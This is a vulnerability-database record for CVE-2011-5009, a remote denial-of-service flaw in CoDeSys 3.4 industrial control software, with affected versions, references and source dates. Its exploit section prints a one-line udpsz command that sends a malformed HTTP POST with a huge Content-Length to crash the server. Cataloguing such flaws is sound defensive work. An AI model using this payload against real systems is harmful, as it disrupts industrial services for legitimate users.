Details of VAR-E-201111-0007

ID

VAR-E-201111-0007

CVE

cve_id:	CVE-2011-5009	Trust: 1.9
cve_id:	CVE-2011-5007	Trust: 0.3
cve_id:	CVE-2011-5008	Trust: 0.3

sources: BID: 50854 // BID: 50849 // EXPLOIT-DB: 36377 // EDBNET: 57721

EDB ID

36377

TITLE

CoDeSys 3.4 - POST Null Pointer Content-Length Parsing Remote Denial of Service - Multiple dos Exploit

Trust: 0.6

sources: EXPLOIT-DB: 36377

DESCRIPTION

CoDeSys 3.4 - POST Null Pointer Content-Length Parsing Remote Denial of Service. CVE-2011-5009CVE-77388 . dos exploit for Multiple platform

Trust: 0.6

sources: EXPLOIT-DB: 36377

AFFECTED PRODUCTS

vendor:	codesys	model:	-	scope:	eq	version:	3.4	Trust: 1.0
vendor:	3s smart	model:	codesys sp4 patch	scope:	eq	version:	3.42	Trust: 0.6
vendor:	3s smart	model:	codesys	scope:	eq	version:	3.4	Trust: 0.6
vendor:	3s smart	model:	codesys	scope:	eq	version:	2.3	Trust: 0.6
vendor:	3s smart	model:	codesys	scope:	ne	version:	3.5	Trust: 0.6
vendor:	3s smart	model:	codesys	scope:	ne	version:	2.3.9.32	Trust: 0.6

sources: BID: 50854 // BID: 50849 // EXPLOIT-DB: 36377

EXPLOIT

source: https://www.securityfocus.com/bid/50854/info

CoDeSys is prone to multiple denial-of-service vulnerabilities.

An attacker can exploit these issues to crash the application and deny service to legitimate users.

udpsz -T -c "POST / HTTP/1.0\r\nContent-Length: 4294967295\r\n\r\n" SERVER 8080 -1

Trust: 1.0

sources: EXPLOIT-DB: 36377

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 36377

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 36377

TYPE

POST Null Pointer Content-Length Parsing Remote Denial of Service

Trust: 1.0

sources: EXPLOIT-DB: 36377

CREDITS

Luigi Auriemma

Trust: 0.6

sources: EXPLOIT-DB: 36377

EXTERNAL IDS

db:	NVD	id:	CVE-2011-5009	Trust: 1.9
db:	BID	id:	50854	Trust: 1.9
db:	EXPLOIT-DB	id:	36377	Trust: 1.6
db:	ICS CERT	id:	ICSA-12-006-01	Trust: 0.6
db:	EDBNET	id:	57721	Trust: 0.6
db:	NVD	id:	CVE-2011-5007	Trust: 0.3
db:	NVD	id:	CVE-2011-5008	Trust: 0.3
db:	BID	id:	50849	Trust: 0.3

sources: BID: 50854 // BID: 50849 // EXPLOIT-DB: 36377 // EDBNET: 57721

REFERENCES

url:	https://nvd.nist.gov/vuln/detail/cve-2011-5009	Trust: 1.6
url:	https://www.securityfocus.com/bid/50854/info	Trust: 1.0
url:	http://www.3s-software.com/index.shtml?en_codesysv3_en	Trust: 0.6
url:	http://aluigi.altervista.org/adv/codesys_1-adv.txt	Trust: 0.6
url:	http://www.us-cert.gov/control_systems/pdf/icsa-12-006-01.pdf	Trust: 0.6
url:	https://www.exploit-db.com/exploits/36377/	Trust: 0.6

sources: BID: 50854 // BID: 50849 // EXPLOIT-DB: 36377 // EDBNET: 57721

SOURCES

db:	BID	id:	50854
db:	BID	id:	50849
db:	EXPLOIT-DB	id:	36377
db:	EDBNET	id:	57721

LAST UPDATE DATE

2022-07-27T09:12:24.849000+00:00

SOURCES UPDATE DATE

db:	BID	id:	50854	date:	2012-01-10T20:00:00
db:	BID	id:	50849	date:	2012-11-15T23:10:00

SOURCES RELEASE DATE

db:	BID	id:	50854	date:	2011-11-30T00:00:00
db:	BID	id:	50849	date:	2011-11-29T00:00:00
db:	EXPLOIT-DB	id:	36377	date:	2011-11-30T00:00:00
db:	EDBNET	id:	57721	date:	2011-11-30T00:00:00